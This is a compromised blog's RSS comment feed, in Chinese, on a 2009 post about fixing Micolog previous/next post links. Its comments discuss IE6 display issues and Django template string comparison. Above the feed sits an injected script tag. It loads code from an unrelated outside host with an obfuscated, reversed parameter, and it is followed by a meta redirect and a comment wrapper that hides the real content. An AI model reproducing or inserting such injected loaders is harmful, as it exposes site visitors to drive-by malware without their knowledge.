<script src='http://turnitupnow.net/?rnd=7550deef%2Flmth.noisufnoc-fo-tsop-a-tsop-a-retfa-dna-erofeb-elcitra-golocim-desiver%2F42%2F70%2F9002%2Fmoc.elcerim.www'></script><meta http-equiv='refresh' content='0;url=http://www.mirecle.com/2009/07/24/revised-micolog-article-before-and-after-a-post-a-post-of-confusion.html/feed'><!--<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>《修正micolog文章中前一post与后一post的混乱问题》的评论</title>
	<atom:link href="http://www.mirecle.com/2009/07/24/revised-micolog-article-before-and-after-a-post-a-post-of-confusion.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.mirecle.com/2009/07/24/revised-micolog-article-before-and-after-a-post-a-post-of-confusion.html</link>
	<description>it,技术,经济生活,互联网</description>
	<lastBuildDate>Tue, 31 Jan 2012 13:31:22 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2</generator>
	<item>
		<title>作者：yanpeng</title>
		<link>http://www.mirecle.com/2009/07/24/revised-micolog-article-before-and-after-a-post-a-post-of-confusion.html/comment-page-1#comment-565</link>
		<dc:creator>yanpeng</dc:creator>
		<pubDate>Wed, 30 Nov -0001 00:00:00 +0000</pubDate>
		<guid isPermaLink="false">/2009/07/24/6021.html#comment-565</guid>
		<description>ie6的市场占有率还是在60%多呢，加油哦，要优化博客才好</description>
		<content:encoded><![CDATA[<p>ie6的市场占有率还是在60%多呢，加油哦，要优化博客才好</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：yanjingtu</title>
		<link>http://www.mirecle.com/2009/07/24/revised-micolog-article-before-and-after-a-post-a-post-of-confusion.html/comment-page-1#comment-566</link>
		<dc:creator>yanjingtu</dc:creator>
		<pubDate>Wed, 30 Nov -0001 00:00:00 +0000</pubDate>
		<guid isPermaLink="false">/2009/07/24/6021.html#comment-566</guid>
		<description>谢谢啦，确实好了！很好很强大！&lt;br /&gt;我的博客在IE下的显示也有点不正常了，想换IE7了。。。</description>
		<content:encoded><![CDATA[<p>谢谢啦，确实好了！很好很强大！<br />
<br />我的博客在IE下的显示也有点不正常了，想换IE7了。。。</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：Peng</title>
		<link>http://www.mirecle.com/2009/07/24/revised-micolog-article-before-and-after-a-post-a-post-of-confusion.html/comment-page-1#comment-567</link>
		<dc:creator>Peng</dc:creator>
		<pubDate>Wed, 30 Nov -0001 00:00:00 +0000</pubDate>
		<guid isPermaLink="false">/2009/07/24/6021.html#comment-567</guid>
		<description>晕，google出错居然是这个问题，我之前改代码的时候也碰到了，刚好。</description>
		<content:encoded><![CDATA[<p>晕，google出错居然是这个问题，我之前改代码的时候也碰到了，刚好。</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：yanpeng</title>
		<link>http://www.mirecle.com/2009/07/24/revised-micolog-article-before-and-after-a-post-a-post-of-confusion.html/comment-page-1#comment-568</link>
		<dc:creator>yanpeng</dc:creator>
		<pubDate>Wed, 30 Nov -0001 00:00:00 +0000</pubDate>
		<guid isPermaLink="false">/2009/07/24/6021.html#comment-568</guid>
		<description>@houkai&lt;blockquote&gt;请教个问题 python如果判断两个字符串相等 比如 判断comment.email如果是hikefreeman@gmail.com，我用了以下方法都不对。我是在html里用的。&lt;br /&gt;&lt;br /&gt;{%if comment.email==&quot;hikefreeman@gmail.com&quot; %}&lt;br /&gt;&lt;br /&gt;{%if comment.email==‘hikefreeman@gmail.com’ %}&lt;br /&gt;&lt;br /&gt;{%if comment.email&lt;&gt;‘hikefreeman@gmail.com’ %}&lt;br /&gt;&lt;br /&gt;{%if {{comment.email}}==‘hikefreeman@gmail.com’ %}&lt;br /&gt;&lt;br /&gt;请给个正确的答案。谢谢&lt;br /&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;用ifequal吧 &lt;img src=&quot;http://yanpblog.appspot.com/static/images/icons/icon_smile.gif&quot; /&gt; ，比如：&lt;br /&gt;{% ifequal user.username &quot;adrian&quot; %}&lt;br /&gt;    ...&lt;br /&gt;{% endifequal %}&lt;br /&gt;</description>
		<content:encoded><![CDATA[<p>@houkai<br />
<blockquote>请教个问题 python如果判断两个字符串相等 比如 判断comment.email如果是hikefreeman@gmail.com，我用了以下方法都不对。我是在html里用的。</p>
<p>{%if comment.email==&quot;hikefreeman@gmail.com&quot; %}</p>
<p>{%if comment.email==‘hikefreeman@gmail.com’ %}</p>
<p>{%if comment.email&lt;&gt;‘hikefreeman@gmail.com’ %}</p>
<p>{%if {{comment.email}}==‘hikefreeman@gmail.com’ %}</p>
<p>请给个正确的答案。谢谢</p>
</blockquote>
<p>用ifequal吧 <img src="http://yanpblog.appspot.com/static/images/icons/icon_smile.gif" /> ，比如：<br />{% ifequal user.username &quot;adrian&quot; %}<br />    &#8230;<br />{% endifequal %}</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：houkai</title>
		<link>http://www.mirecle.com/2009/07/24/revised-micolog-article-before-and-after-a-post-a-post-of-confusion.html/comment-page-1#comment-569</link>
		<dc:creator>houkai</dc:creator>
		<pubDate>Wed, 30 Nov -0001 00:00:00 +0000</pubDate>
		<guid isPermaLink="false">/2009/07/24/6021.html#comment-569</guid>
		<description>谢谢 搞定！！！ &lt;img src=&quot;http://yanpblog.appspot.com/static/images/icons/icon_smile.gif&quot; /&gt;</description>
		<content:encoded><![CDATA[<p>谢谢 搞定！！！ <img src="http://yanpblog.appspot.com/static/images/icons/icon_smile.gif" /></p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：houkai</title>
		<link>http://www.mirecle.com/2009/07/24/revised-micolog-article-before-and-after-a-post-a-post-of-confusion.html/comment-page-1#comment-570</link>
		<dc:creator>houkai</dc:creator>
		<pubDate>Wed, 30 Nov -0001 00:00:00 +0000</pubDate>
		<guid isPermaLink="false">/2009/07/24/6021.html#comment-570</guid>
		<description>请教个问题 python如果判断两个字符串相等 比如 判断comment.email如果是hikefreeman@gmail.com，我用了以下方法都不对。我是在html里用的。&lt;br /&gt;{%if comment.email==&quot;hikefreeman@gmail.com&quot; %}&lt;br /&gt;{%if comment.email==‘hikefreeman@gmail.com’ %}&lt;br /&gt;{%if comment.email&lt;&gt;‘hikefreeman@gmail.com’ %}&lt;br /&gt;{%if {{comment.email}}==‘hikefreeman@gmail.com’ %}&lt;br /&gt;请给个正确的答案。谢谢&lt;br /&gt;</description>
		<content:encoded><![CDATA[<p>请教个问题 python如果判断两个字符串相等 比如 判断comment.email如果是hikefreeman@gmail.com，我用了以下方法都不对。我是在html里用的。<br />
<br />{%if comment.email==&quot;hikefreeman@gmail.com&quot; %}<br />
<br />{%if comment.email==‘hikefreeman@gmail.com’ %}<br />
<br />{%if comment.email&lt;&gt;‘hikefreeman@gmail.com’ %}<br />
<br />{%if {{comment.email}}==‘hikefreeman@gmail.com’ %}<br />
<br />请给个正确的答案。谢谢<br /></p>
]]></content:encoded>
	</item>
</channel>
</rss>

